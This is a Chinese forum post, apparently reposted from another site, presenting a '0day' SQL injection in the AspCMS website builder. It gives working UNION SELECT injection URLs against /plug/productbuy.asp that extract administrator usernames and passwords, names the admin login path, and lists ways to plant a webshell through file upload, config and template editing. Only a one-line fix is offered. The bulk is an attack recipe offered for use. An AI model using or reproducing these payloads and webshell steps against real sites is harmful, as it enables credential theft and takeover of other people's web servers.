• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    aspcms企业建站系统0day漏洞介绍

    发布者: 忻慕2619 | 发布时间: 2025-6-27 15:12| 查看数: 81| 评论数: 0|帖子模式

    漏洞出现在
    /plug/productbuy.asp
    对接收的参数id没有进行过滤而导致的注入漏洞
    注入后的页面有跳转,所以要快,建议用快捷键复制
    爆用户名
    /plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
    26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
    这是爆ID=1的账户名,如果发现权限不够可以往后试2,3,4...........

    爆密码
    /plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
    26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

    后台登录地址:/admin/login.asp

    后台拿shell
    1、直接上传.asp;x
    2、系统配置信息
    3、模版管理新建1.asp模板,内容写马的内容.

    修复方法: id用cint(request("id"))
    来源:https://www.jb51.net/hack/39054.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表